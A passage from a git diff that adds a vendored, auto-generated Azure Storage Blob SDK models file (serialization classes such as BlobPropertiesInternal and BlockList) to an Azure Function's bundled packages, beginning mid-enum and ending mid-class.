UNAUTHORIZED_BLOB_OVERWRITE = "UnauthorizedBlobOverwrite" + BLOB_BEING_REHYDRATED = "BlobBeingRehydrated" + BLOB_ARCHIVED = "BlobArchived" + BLOB_NOT_ARCHIVED = "BlobNotArchived" + AUTHORIZATION_SOURCE_IP_MISMATCH = "AuthorizationSourceIPMismatch" + AUTHORIZATION_PROTOCOL_MISMATCH = "AuthorizationProtocolMismatch" + AUTHORIZATION_PERMISSION_MISMATCH = "AuthorizationPermissionMismatch" + AUTHORIZATION_SERVICE_MISMATCH = "AuthorizationServiceMismatch" + AUTHORIZATION_RESOURCE_TYPE_MISMATCH = "AuthorizationResourceTypeMismatch" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_models.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_models.py new file mode 100644 index 0000000..172825c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_models.py @@ -0,0 +1,2600 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from azure.core.exceptions import HttpResponseError +import msrest.serialization + + +class AccessPolicy(msrest.serialization.Model): + """An Access policy. + + :ivar start: the date-time the policy is active. + :vartype start: str + :ivar expiry: the date-time the policy expires. + :vartype expiry: str + :ivar permission: the permissions for the acl policy. + :vartype permission: str + """ + + _attribute_map = { + 'start': {'key': 'Start', 'type': 'str'}, + 'expiry': {'key': 'Expiry', 'type': 'str'}, + 'permission': {'key': 'Permission', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword start: the date-time the policy is active. + :paramtype start: str + :keyword expiry: the date-time the policy expires. + :paramtype expiry: str + :keyword permission: the permissions for the acl policy. + :paramtype permission: str + """ + super(AccessPolicy, self).__init__(**kwargs) + self.start = kwargs.get('start', None) + self.expiry = kwargs.get('expiry', None) + self.permission = kwargs.get('permission', None) + + +class AppendPositionAccessConditions(msrest.serialization.Model): + """Parameter group. + + :ivar max_size: Optional conditional header. The max length in bytes permitted for the append + blob. If the Append Block operation would cause the blob to exceed that limit or if the blob + size is already greater than the value specified in this header, the request will fail with + MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :vartype max_size: long + :ivar append_position: Optional conditional header, used only for the Append Block operation. A + number indicating the byte offset to compare. Append Block will succeed only if the append + position is equal to this number. If it is not, the request will fail with the + AppendPositionConditionNotMet error (HTTP status code 412 - Precondition Failed). + :vartype append_position: long + """ + + _attribute_map = { + 'max_size': {'key': 'maxSize', 'type': 'long'}, + 'append_position': {'key': 'appendPosition', 'type': 'long'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword max_size: Optional conditional header. The max length in bytes permitted for the + append blob. If the Append Block operation would cause the blob to exceed that limit or if the + blob size is already greater than the value specified in this header, the request will fail + with MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :paramtype max_size: long + :keyword append_position: Optional conditional header, used only for the Append Block + operation. A number indicating the byte offset to compare. Append Block will succeed only if + the append position is equal to this number. If it is not, the request will fail with the + AppendPositionConditionNotMet error (HTTP status code 412 - Precondition Failed). + :paramtype append_position: long + """ + super(AppendPositionAccessConditions, self).__init__(**kwargs) + self.max_size = kwargs.get('max_size', None) + self.append_position = kwargs.get('append_position', None) + + +class ArrowConfiguration(msrest.serialization.Model): + """Groups the settings used for formatting the response if the response should be Arrow formatted. + + All required parameters must be populated in order to send to Azure. + + :ivar schema: Required. + :vartype schema: list[~azure.storage.blob.models.ArrowField] + """ + + _validation = { + 'schema': {'required': True}, + } + + _attribute_map = { + 'schema': {'key': 'Schema', 'type': '[ArrowField]', 'xml': {'name': 'Schema', 'wrapped': True, 'itemsName': 'Field'}}, + } + _xml_map = { + 'name': 'ArrowConfiguration' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword schema: Required. + :paramtype schema: list[~azure.storage.blob.models.ArrowField] + """ + super(ArrowConfiguration, self).__init__(**kwargs) + self.schema = kwargs['schema'] + + +class ArrowField(msrest.serialization.Model): + """Groups settings regarding specific field of an arrow schema. + + All required parameters must be populated in order to send to Azure. + + :ivar type: Required. + :vartype type: str + :ivar name: + :vartype name: str + :ivar precision: + :vartype precision: int + :ivar scale: + :vartype scale: int + """ + + _validation = { + 'type': {'required': True}, + } + + _attribute_map = { + 'type': {'key': 'Type', 'type': 'str'}, + 'name': {'key': 'Name', 'type': 'str'}, + 'precision': {'key': 'Precision', 'type': 'int'}, + 'scale': {'key': 'Scale', 'type': 'int'}, + } + _xml_map = { + 'name': 'Field' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword type: Required. + :paramtype type: str + :keyword name: + :paramtype name: str + :keyword precision: + :paramtype precision: int + :keyword scale: + :paramtype scale: int + """ + super(ArrowField, self).__init__(**kwargs) + self.type = kwargs['type'] + self.name = kwargs.get('name', None) + self.precision = kwargs.get('precision', None) + self.scale = kwargs.get('scale', None) + + +class BlobFlatListSegment(msrest.serialization.Model): + """BlobFlatListSegment. + + All required parameters must be populated in order to send to Azure. + + :ivar blob_items: Required. + :vartype blob_items: list[~azure.storage.blob.models.BlobItemInternal] + """ + + _validation = { + 'blob_items': {'required': True}, + } + + _attribute_map = { + 'blob_items': {'key': 'BlobItems', 'type': '[BlobItemInternal]'}, + } + _xml_map = { + 'name': 'Blobs' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword blob_items: Required. + :paramtype blob_items: list[~azure.storage.blob.models.BlobItemInternal] + """ + super(BlobFlatListSegment, self).__init__(**kwargs) + self.blob_items = kwargs['blob_items'] + + +class BlobHierarchyListSegment(msrest.serialization.Model): + """BlobHierarchyListSegment. + + All required parameters must be populated in order to send to Azure. + + :ivar blob_prefixes: + :vartype blob_prefixes: list[~azure.storage.blob.models.BlobPrefix] + :ivar blob_items: Required. + :vartype blob_items: list[~azure.storage.blob.models.BlobItemInternal] + """ + + _validation = { + 'blob_items': {'required': True}, + } + + _attribute_map = { + 'blob_prefixes': {'key': 'BlobPrefixes', 'type': '[BlobPrefix]', 'xml': {'name': 'BlobPrefix'}}, + 'blob_items': {'key': 'BlobItems', 'type': '[BlobItemInternal]', 'xml': {'name': 'Blob', 'itemsName': 'Blob'}}, + } + _xml_map = { + 'name': 'Blobs' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword blob_prefixes: + :paramtype blob_prefixes: list[~azure.storage.blob.models.BlobPrefix] + :keyword blob_items: Required. + :paramtype blob_items: list[~azure.storage.blob.models.BlobItemInternal] + """ + super(BlobHierarchyListSegment, self).__init__(**kwargs) + self.blob_prefixes = kwargs.get('blob_prefixes', None) + self.blob_items = kwargs['blob_items'] + + +class BlobHTTPHeaders(msrest.serialization.Model): + """Parameter group. + + :ivar blob_cache_control: Optional. Sets the blob's cache control. If specified, this property + is stored with the blob and returned with a read request. + :vartype blob_cache_control: str + :ivar blob_content_type: Optional. Sets the blob's content type. If specified, this property is + stored with the blob and returned with a read request. + :vartype blob_content_type: str + :ivar blob_content_md5: Optional. An MD5 hash of the blob content. Note that this hash is not + validated, as the hashes for the individual blocks were validated when each was uploaded. + :vartype blob_content_md5: bytearray + :ivar blob_content_encoding: Optional. Sets the blob's content encoding. If specified, this + property is stored with the blob and returned with a read request. + :vartype blob_content_encoding: str + :ivar blob_content_language: Optional. Set the blob's content language. If specified, this + property is stored with the blob and returned with a read request. + :vartype blob_content_language: str + :ivar blob_content_disposition: Optional. Sets the blob's Content-Disposition header. + :vartype blob_content_disposition: str + """ + + _attribute_map = { + 'blob_cache_control': {'key': 'blobCacheControl', 'type': 'str'}, + 'blob_content_type': {'key': 'blobContentType', 'type': 'str'}, + 'blob_content_md5': {'key': 'blobContentMD5', 'type': 'bytearray'}, + 'blob_content_encoding': {'key': 'blobContentEncoding', 'type': 'str'}, + 'blob_content_language': {'key': 'blobContentLanguage', 'type': 'str'}, + 'blob_content_disposition': {'key': 'blobContentDisposition', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword blob_cache_control: Optional. Sets the blob's cache control. If specified, this + property is stored with the blob and returned with a read request. + :paramtype blob_cache_control: str + :keyword blob_content_type: Optional. Sets the blob's content type. If specified, this property + is stored with the blob and returned with a read request. + :paramtype blob_content_type: str + :keyword blob_content_md5: Optional. An MD5 hash of the blob content. Note that this hash is + not validated, as the hashes for the individual blocks were validated when each was uploaded. + :paramtype blob_content_md5: bytearray + :keyword blob_content_encoding: Optional. Sets the blob's content encoding. If specified, this + property is stored with the blob and returned with a read request. + :paramtype blob_content_encoding: str + :keyword blob_content_language: Optional. Set the blob's content language. If specified, this + property is stored with the blob and returned with a read request. + :paramtype blob_content_language: str + :keyword blob_content_disposition: Optional. Sets the blob's Content-Disposition header. + :paramtype blob_content_disposition: str + """ + super(BlobHTTPHeaders, self).__init__(**kwargs) + self.blob_cache_control = kwargs.get('blob_cache_control', None) + self.blob_content_type = kwargs.get('blob_content_type', None) + self.blob_content_md5 = kwargs.get('blob_content_md5', None) + self.blob_content_encoding = kwargs.get('blob_content_encoding', None) + self.blob_content_language = kwargs.get('blob_content_language', None) + self.blob_content_disposition = kwargs.get('blob_content_disposition', None) + + +class BlobItemInternal(msrest.serialization.Model): + """An Azure Storage blob. + + All required parameters must be populated in order to send to Azure. + + :ivar name: Required. + :vartype name: ~azure.storage.blob.models.BlobName + :ivar deleted: Required. + :vartype deleted: bool + :ivar snapshot: Required. + :vartype snapshot: str + :ivar version_id: + :vartype version_id: str + :ivar is_current_version: + :vartype is_current_version: bool + :ivar properties: Required. Properties of a blob. + :vartype properties: ~azure.storage.blob.models.BlobPropertiesInternal + :ivar metadata: + :vartype metadata: ~azure.storage.blob.models.BlobMetadata + :ivar blob_tags: Blob tags. + :vartype blob_tags: ~azure.storage.blob.models.BlobTags + :ivar has_versions_only: + :vartype has_versions_only: bool + :ivar object_replication_metadata: Dictionary of :code:``. + :vartype object_replication_metadata: dict[str, str] + """ + + _validation = { + 'name': {'required': True}, + 'deleted': {'required': True}, + 'snapshot': {'required': True}, + 'properties': {'required': True}, + } + + _attribute_map = { + 'name': {'key': 'Name', 'type': 'BlobName'}, + 'deleted': {'key': 'Deleted', 'type': 'bool'}, + 'snapshot': {'key': 'Snapshot', 'type': 'str'}, + 'version_id': {'key': 'VersionId', 'type': 'str'}, + 'is_current_version': {'key': 'IsCurrentVersion', 'type': 'bool'}, + 'properties': {'key': 'Properties', 'type': 'BlobPropertiesInternal'}, + 'metadata': {'key': 'Metadata', 'type': 'BlobMetadata'}, + 'blob_tags': {'key': 'BlobTags', 'type': 'BlobTags'}, + 'has_versions_only': {'key': 'HasVersionsOnly', 'type': 'bool'}, + 'object_replication_metadata': {'key': 'OrMetadata', 'type': '{str}'}, + } + _xml_map = { + 'name': 'Blob' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword name: Required. + :paramtype name: ~azure.storage.blob.models.BlobName + :keyword deleted: Required. + :paramtype deleted: bool + :keyword snapshot: Required. + :paramtype snapshot: str + :keyword version_id: + :paramtype version_id: str + :keyword is_current_version: + :paramtype is_current_version: bool + :keyword properties: Required. Properties of a blob. + :paramtype properties: ~azure.storage.blob.models.BlobPropertiesInternal + :keyword metadata: + :paramtype metadata: ~azure.storage.blob.models.BlobMetadata + :keyword blob_tags: Blob tags. + :paramtype blob_tags: ~azure.storage.blob.models.BlobTags + :keyword has_versions_only: + :paramtype has_versions_only: bool + :keyword object_replication_metadata: Dictionary of :code:``. + :paramtype object_replication_metadata: dict[str, str] + """ + super(BlobItemInternal, self).__init__(**kwargs) + self.name = kwargs['name'] + self.deleted = kwargs['deleted'] + self.snapshot = kwargs['snapshot'] + self.version_id = kwargs.get('version_id', None) + self.is_current_version = kwargs.get('is_current_version', None) + self.properties = kwargs['properties'] + self.metadata = kwargs.get('metadata', None) + self.blob_tags = kwargs.get('blob_tags', None) + self.has_versions_only = kwargs.get('has_versions_only', None) + self.object_replication_metadata = kwargs.get('object_replication_metadata', None) + + +class BlobMetadata(msrest.serialization.Model): + """BlobMetadata. + + :ivar additional_properties: Unmatched properties from the message are deserialized to this + collection. + :vartype additional_properties: dict[str, str] + :ivar encrypted: + :vartype encrypted: str + """ + + _attribute_map = { + 'additional_properties': {'key': '', 'type': '{str}'}, + 'encrypted': {'key': 'Encrypted', 'type': 'str', 'xml': {'attr': True}}, + } + _xml_map = { + 'name': 'Metadata' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword additional_properties: Unmatched properties from the message are deserialized to this + collection. + :paramtype additional_properties: dict[str, str] + :keyword encrypted: + :paramtype encrypted: str + """ + super(BlobMetadata, self).__init__(**kwargs) + self.additional_properties = kwargs.get('additional_properties', None) + self.encrypted = kwargs.get('encrypted', None) + + +class BlobName(msrest.serialization.Model): + """BlobName. + + :ivar encoded: Indicates if the blob name is encoded. + :vartype encoded: bool + :ivar content: The name of the blob. + :vartype content: str + """ + + _attribute_map = { + 'encoded': {'key': 'Encoded', 'type': 'bool', 'xml': {'name': 'Encoded', 'attr': True}}, + 'content': {'key': 'content', 'type': 'str', 'xml': {'text': True}}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword encoded: Indicates if the blob name is encoded. + :paramtype encoded: bool + :keyword content: The name of the blob. + :paramtype content: str + """ + super(BlobName, self).__init__(**kwargs) + self.encoded = kwargs.get('encoded', None) + self.content = kwargs.get('content', None) + + +class BlobPrefix(msrest.serialization.Model): + """BlobPrefix. + + All required parameters must be populated in order to send to Azure. + + :ivar name: Required. + :vartype name: ~azure.storage.blob.models.BlobName + """ + + _validation = { + 'name': {'required': True}, + } + + _attribute_map = { + 'name': {'key': 'Name', 'type': 'BlobName'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword name: Required. + :paramtype name: ~azure.storage.blob.models.BlobName + """ + super(BlobPrefix, self).__init__(**kwargs) + self.name = kwargs['name'] + + +class BlobPropertiesInternal(msrest.serialization.Model): + """Properties of a blob. + + All required parameters must be populated in order to send to Azure. + + :ivar creation_time: + :vartype creation_time: ~datetime.datetime + :ivar last_modified: Required. + :vartype last_modified: ~datetime.datetime + :ivar etag: Required. + :vartype etag: str + :ivar content_length: Size in bytes. + :vartype content_length: long + :ivar content_type: + :vartype content_type: str + :ivar content_encoding: + :vartype content_encoding: str + :ivar content_language: + :vartype content_language: str + :ivar content_md5: + :vartype content_md5: bytearray + :ivar content_disposition: + :vartype content_disposition: str + :ivar cache_control: + :vartype cache_control: str + :ivar blob_sequence_number: + :vartype blob_sequence_number: long + :ivar blob_type: Possible values include: "BlockBlob", "PageBlob", "AppendBlob". + :vartype blob_type: str or ~azure.storage.blob.models.BlobType + :ivar lease_status: Possible values include: "locked", "unlocked". + :vartype lease_status: str or ~azure.storage.blob.models.LeaseStatusType + :ivar lease_state: Possible values include: "available", "leased", "expired", "breaking", + "broken". + :vartype lease_state: str or ~azure.storage.blob.models.LeaseStateType + :ivar lease_duration: Possible values include: "infinite", "fixed". + :vartype lease_duration: str or ~azure.storage.blob.models.LeaseDurationType + :ivar copy_id: + :vartype copy_id: str + :ivar copy_status: Possible values include: "pending", "success", "aborted", "failed". + :vartype copy_status: str or ~azure.storage.blob.models.CopyStatusType + :ivar copy_source: + :vartype copy_source: str + :ivar copy_progress: + :vartype copy_progress: str + :ivar copy_completion_time: + :vartype copy_completion_time: ~datetime.datetime + :ivar copy_status_description: + :vartype copy_status_description: str + :ivar server_encrypted: + :vartype server_encrypted: bool + :ivar incremental_copy: + :vartype incremental_copy: bool + :ivar destination_snapshot: + :vartype destination_snapshot: str + :ivar deleted_time: + :vartype deleted_time: ~datetime.datetime + :ivar remaining_retention_days: + :vartype remaining_retention_days: int + :ivar access_tier: Possible values include: "P4", "P6", "P10", "P15", "P20", "P30", "P40", + "P50", "P60", "P70", "P80", "Hot", "Cool", "Archive". + :vartype access_tier: str or ~azure.storage.blob.models.AccessTier + :ivar access_tier_inferred: + :vartype access_tier_inferred: bool + :ivar archive_status: Possible values include: "rehydrate-pending-to-hot", + "rehydrate-pending-to-cool". + :vartype archive_status: str or ~azure.storage.blob.models.ArchiveStatus + :ivar customer_provided_key_sha256: + :vartype customer_provided_key_sha256: str + :ivar encryption_scope: The name of the encryption scope under which the blob is encrypted. + :vartype encryption_scope: str + :ivar access_tier_change_time: + :vartype access_tier_change_time: ~datetime.datetime + :ivar tag_count: + :vartype tag_count: int + :ivar expires_on: + :vartype expires_on: ~datetime.datetime + :ivar is_sealed: + :vartype is_sealed: bool + :ivar rehydrate_priority: If an object is in rehydrate pending state then this header is + returned with priority of rehydrate. Valid values are High and Standard. Possible values + include: "High", "Standard". + :vartype rehydrate_priority: str or ~azure.storage.blob.models.RehydratePriority + :ivar last_accessed_on: + :vartype last_accessed_on: ~datetime.datetime + :ivar immutability_policy_expires_on: + :vartype immutability_policy_expires_on: ~datetime.datetime + :ivar immutability_policy_mode: Possible values include: "Mutable", "Unlocked", "Locked". + :vartype immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :ivar legal_hold: + :vartype legal_hold: bool + """ + + _validation = { + 'last_modified': {'required': True}, + 'etag': {'required': True}, + } + + _attribute_map = { + 'creation_time': {'key': 'Creation-Time', 'type': 'rfc-1123'}, + 'last_modified': {'key': 'Last-Modified', 'type': 'rfc-1123'}, + 'etag': {'key': 'Etag', 'type': 'str'}, + 'content_length': {'key': 'Content-Length', 'type': 'long'}, + 'content_type': {'key': 'Content-Type', 'type': 'str'}, + 'content_encoding': {'key': 'Content-Encoding', 'type': 'str'}, + 'content_language': {'key': 'Content-Language', 'type': 'str'}, + 'content_md5': {'key': 'Content-MD5', 'type': 'bytearray'}, + 'content_disposition': {'key': 'Content-Disposition', 'type': 'str'}, + 'cache_control': {'key': 'Cache-Control', 'type': 'str'}, + 'blob_sequence_number': {'key': 'x-ms-blob-sequence-number', 'type': 'long'}, + 'blob_type': {'key': 'BlobType', 'type': 'str'}, + 'lease_status': {'key': 'LeaseStatus', 'type': 'str'}, + 'lease_state': {'key': 'LeaseState', 'type': 'str'}, + 'lease_duration': {'key': 'LeaseDuration', 'type': 'str'}, + 'copy_id': {'key': 'CopyId', 'type': 'str'}, + 'copy_status': {'key': 'CopyStatus', 'type': 'str'}, + 'copy_source': {'key': 'CopySource', 'type': 'str'}, + 'copy_progress': {'key': 'CopyProgress', 'type': 'str'}, + 'copy_completion_time': {'key': 'CopyCompletionTime', 'type': 'rfc-1123'}, + 'copy_status_description': {'key': 'CopyStatusDescription', 'type': 'str'}, + 'server_encrypted': {'key': 'ServerEncrypted', 'type': 'bool'}, + 'incremental_copy': {'key': 'IncrementalCopy', 'type': 'bool'}, + 'destination_snapshot': {'key': 'DestinationSnapshot', 'type': 'str'}, + 'deleted_time': {'key': 'DeletedTime', 'type': 'rfc-1123'}, + 'remaining_retention_days': {'key': 'RemainingRetentionDays', 'type': 'int'}, + 'access_tier': {'key': 'AccessTier', 'type': 'str'}, + 'access_tier_inferred': {'key': 'AccessTierInferred', 'type': 'bool'}, + 'archive_status': {'key': 'ArchiveStatus', 'type': 'str'}, + 'customer_provided_key_sha256': {'key': 'CustomerProvidedKeySha256', 'type': 'str'}, + 'encryption_scope': {'key': 'EncryptionScope', 'type': 'str'}, + 'access_tier_change_time': {'key': 'AccessTierChangeTime', 'type': 'rfc-1123'}, + 'tag_count': {'key': 'TagCount', 'type': 'int'}, + 'expires_on': {'key': 'Expiry-Time', 'type': 'rfc-1123'}, + 'is_sealed': {'key': 'Sealed', 'type': 'bool'}, + 'rehydrate_priority': {'key': 'RehydratePriority', 'type': 'str'}, + 'last_accessed_on': {'key': 'LastAccessTime', 'type': 'rfc-1123'}, + 'immutability_policy_expires_on': {'key': 'ImmutabilityPolicyUntilDate', 'type': 'rfc-1123'}, + 'immutability_policy_mode': {'key': 'ImmutabilityPolicyMode', 'type': 'str'}, + 'legal_hold': {'key': 'LegalHold', 'type': 'bool'}, + } + _xml_map = { + 'name': 'Properties' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword creation_time: + :paramtype creation_time: ~datetime.datetime + :keyword last_modified: Required. + :paramtype last_modified: ~datetime.datetime + :keyword etag: Required. + :paramtype etag: str + :keyword content_length: Size in bytes. + :paramtype content_length: long + :keyword content_type: + :paramtype content_type: str + :keyword content_encoding: + :paramtype content_encoding: str + :keyword content_language: + :paramtype content_language: str + :keyword content_md5: + :paramtype content_md5: bytearray + :keyword content_disposition: + :paramtype content_disposition: str + :keyword cache_control: + :paramtype cache_control: str + :keyword blob_sequence_number: + :paramtype blob_sequence_number: long + :keyword blob_type: Possible values include: "BlockBlob", "PageBlob", "AppendBlob". + :paramtype blob_type: str or ~azure.storage.blob.models.BlobType + :keyword lease_status: Possible values include: "locked", "unlocked". + :paramtype lease_status: str or ~azure.storage.blob.models.LeaseStatusType + :keyword lease_state: Possible values include: "available", "leased", "expired", "breaking", + "broken". + :paramtype lease_state: str or ~azure.storage.blob.models.LeaseStateType + :keyword lease_duration: Possible values include: "infinite", "fixed". + :paramtype lease_duration: str or ~azure.storage.blob.models.LeaseDurationType + :keyword copy_id: + :paramtype copy_id: str + :keyword copy_status: Possible values include: "pending", "success", "aborted", "failed". + :paramtype copy_status: str or ~azure.storage.blob.models.CopyStatusType + :keyword copy_source: + :paramtype copy_source: str + :keyword copy_progress: + :paramtype copy_progress: str + :keyword copy_completion_time: + :paramtype copy_completion_time: ~datetime.datetime + :keyword copy_status_description: + :paramtype copy_status_description: str + :keyword server_encrypted: + :paramtype server_encrypted: bool + :keyword incremental_copy: + :paramtype incremental_copy: bool + :keyword destination_snapshot: + :paramtype destination_snapshot: str + :keyword deleted_time: + :paramtype deleted_time: ~datetime.datetime + :keyword remaining_retention_days: + :paramtype remaining_retention_days: int + :keyword access_tier: Possible values include: "P4", "P6", "P10", "P15", "P20", "P30", "P40", + "P50", "P60", "P70", "P80", "Hot", "Cool", "Archive". + :paramtype access_tier: str or ~azure.storage.blob.models.AccessTier + :keyword access_tier_inferred: + :paramtype access_tier_inferred: bool + :keyword archive_status: Possible values include: "rehydrate-pending-to-hot", + "rehydrate-pending-to-cool". + :paramtype archive_status: str or ~azure.storage.blob.models.ArchiveStatus + :keyword customer_provided_key_sha256: + :paramtype customer_provided_key_sha256: str + :keyword encryption_scope: The name of the encryption scope under which the blob is encrypted. + :paramtype encryption_scope: str + :keyword access_tier_change_time: + :paramtype access_tier_change_time: ~datetime.datetime + :keyword tag_count: + :paramtype tag_count: int + :keyword expires_on: + :paramtype expires_on: ~datetime.datetime + :keyword is_sealed: + :paramtype is_sealed: bool + :keyword rehydrate_priority: If an object is in rehydrate pending state then this header is + returned with priority of rehydrate. Valid values are High and Standard. Possible values + include: "High", "Standard". + :paramtype rehydrate_priority: str or ~azure.storage.blob.models.RehydratePriority + :keyword last_accessed_on: + :paramtype last_accessed_on: ~datetime.datetime + :keyword immutability_policy_expires_on: + :paramtype immutability_policy_expires_on: ~datetime.datetime + :keyword immutability_policy_mode: Possible values include: "Mutable", "Unlocked", "Locked". + :paramtype immutability_policy_mode: str or + ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :keyword legal_hold: + :paramtype legal_hold: bool + """ + super(BlobPropertiesInternal, self).__init__(**kwargs) + self.creation_time = kwargs.get('creation_time', None) + self.last_modified = kwargs['last_modified'] + self.etag = kwargs['etag'] + self.content_length = kwargs.get('content_length', None) + self.content_type = kwargs.get('content_type', None) + self.content_encoding = kwargs.get('content_encoding', None) + self.content_language = kwargs.get('content_language', None) + self.content_md5 = kwargs.get('content_md5', None) + self.content_disposition = kwargs.get('content_disposition', None) + self.cache_control = kwargs.get('cache_control', None) + self.blob_sequence_number = kwargs.get('blob_sequence_number', None) + self.blob_type = kwargs.get('blob_type', None) + self.lease_status = kwargs.get('lease_status', None) + self.lease_state = kwargs.get('lease_state', None) + self.lease_duration = kwargs.get('lease_duration', None) + self.copy_id = kwargs.get('copy_id', None) + self.copy_status = kwargs.get('copy_status', None) + self.copy_source = kwargs.get('copy_source', None) + self.copy_progress = kwargs.get('copy_progress', None) + self.copy_completion_time = kwargs.get('copy_completion_time', None) + self.copy_status_description = kwargs.get('copy_status_description', None) + self.server_encrypted = kwargs.get('server_encrypted', None) + self.incremental_copy = kwargs.get('incremental_copy', None) + self.destination_snapshot = kwargs.get('destination_snapshot', None) + self.deleted_time = kwargs.get('deleted_time', None) + self.remaining_retention_days = kwargs.get('remaining_retention_days', None) + self.access_tier = kwargs.get('access_tier', None) + self.access_tier_inferred = kwargs.get('access_tier_inferred', None) + self.archive_status = kwargs.get('archive_status', None) + self.customer_provided_key_sha256 = kwargs.get('customer_provided_key_sha256', None) + self.encryption_scope = kwargs.get('encryption_scope', None) + self.access_tier_change_time = kwargs.get('access_tier_change_time', None) + self.tag_count = kwargs.get('tag_count', None) + self.expires_on = kwargs.get('expires_on', None) + self.is_sealed = kwargs.get('is_sealed', None) + self.rehydrate_priority = kwargs.get('rehydrate_priority', None) + self.last_accessed_on = kwargs.get('last_accessed_on', None) + self.immutability_policy_expires_on = kwargs.get('immutability_policy_expires_on', None) + self.immutability_policy_mode = kwargs.get('immutability_policy_mode', None) + self.legal_hold = kwargs.get('legal_hold', None) + + +class BlobTag(msrest.serialization.Model): + """BlobTag. + + All required parameters must be populated in order to send to Azure. + + :ivar key: Required. + :vartype key: str + :ivar value: Required. + :vartype value: str + """ + + _validation = { + 'key': {'required': True}, + 'value': {'required': True}, + } + + _attribute_map = { + 'key': {'key': 'Key', 'type': 'str'}, + 'value': {'key': 'Value', 'type': 'str'}, + } + _xml_map = { + 'name': 'Tag' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword key: Required. + :paramtype key: str + :keyword value: Required. + :paramtype value: str + """ + super(BlobTag, self).__init__(**kwargs) + self.key = kwargs['key'] + self.value = kwargs['value'] + + +class BlobTags(msrest.serialization.Model): + """Blob tags. + + All required parameters must be populated in order to send to Azure. + + :ivar blob_tag_set: Required. + :vartype blob_tag_set: list[~azure.storage.blob.models.BlobTag] + """ + + _validation = { + 'blob_tag_set': {'required': True}, + } + + _attribute_map = { + 'blob_tag_set': {'key': 'BlobTagSet', 'type': '[BlobTag]', 'xml': {'name': 'TagSet', 'wrapped': True, 'itemsName': 'Tag'}}, + } + _xml_map = { + 'name': 'Tags' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword blob_tag_set: Required. + :paramtype blob_tag_set: list[~azure.storage.blob.models.BlobTag] + """ + super(BlobTags, self).__init__(**kwargs) + self.blob_tag_set = kwargs['blob_tag_set'] + + +class Block(msrest.serialization.Model): + """Represents a single block in a block blob. It describes the block's ID and size. + + All required parameters must be populated in order to send to Azure. + + :ivar name: Required. The base64 encoded block ID. + :vartype name: str + :ivar size: Required. The block size in bytes. + :vartype size: long + """ + + _validation = { + 'name': {'required': True}, + 'size': {'required': True}, + } + + _attribute_map = { + 'name': {'key': 'Name', 'type': 'str'}, + 'size': {'key': 'Size', 'type': 'long'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword name: Required. The base64 encoded block ID. + :paramtype name: str + :keyword size: Required. The block size in bytes. + :paramtype size: long + """ + super(Block, self).__init__(**kwargs) + self.name = kwargs['name'] + self.size = kwargs['size'] + + +class BlockList(msrest.serialization.Model): + """BlockList. + + :ivar committed_blocks: + :vartype committed_blocks: list[~azure.storage.blob.models.Block] + :ivar uncommitted_blocks: + :vartype uncommitted_blocks: list[~azure.storage.blob.models.Block] + """ + + _attribute_map = { + 'committed_blocks': {'key': 'CommittedBlocks', 'type': '[Block]', 'xml': {'wrapped': True}}, + 'uncommitted_blocks': {'key': 'UncommittedBlocks', 'type': '[Block]', 'xml': {'wrapped': True}}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword committed_blocks: + :paramtype committed_blocks: list[~azure.storage.blob.models.Block] + :keyword uncommitted_blocks: + :paramtype uncommitted_blocks: list[~azure.storage.blob.models.Block] + """ + super(BlockList, self).__init__(**kwargs) + self.committed_blocks = kwargs.get('committed_blocks', None) + self.uncommitted_blocks = kwargs.get('uncommitted_blocks', None) + + +class BlockLookupList(msrest.serialization.Model): + """BlockLookupList. + + :ivar committed: + :vartype committed: list[str] + :ivar uncommitted: + :vartype uncommitted: list[str] + :ivar latest: + :vartype latest: list[str] + """ + + _attribute_map = { + 'committed': {'key': 'Committed', 'type': '[str]', 'xml': {'itemsName': 'Committed'}}, + 'uncommitted': {'key': 'Uncommitted', 'type': '[str]', 'xml': {'itemsName': 'Uncommitted'}}, + 'latest': {'key': 'Latest', 'type': '[str]', 'xml': {'itemsName': 'Latest'}}, + } + _xml_map = { + 'name': 'BlockList' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword committed: + :paramtype committed: list[str] + :keyword uncommitted: + :paramtype uncommitted: list[str] + :keyword latest: + :paramtype latest: list[str] + """ + super(BlockLookupList, self).__init__(**kwargs) + self.committed = kwargs.get('committed', None) + self.uncommitted = kwargs.get('uncommitted', None) + self.latest = kwargs.get('latest', None) + + +class ClearRange(msrest.serialization.Model): + """ClearRange. + + All required parameters must be populated in order to send to Azure. + + :ivar start: Required. + :vartype start: long + :ivar end: Required. + :vartype end: long + """ + + _validation = { + 'start': {'required': True}, + 'end': {'required': True}, + } + + _attribute_map = { + 'start': {'key': 'Start', 'type': 'long', 'xml': {'name': 'Start'}}, + 'end': {'key': 'End', 'type': 'long', 'xml': {'name': 'End'}}, + } + _xml_map = { + 'name': 'ClearRange' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword start: Required. + :paramtype 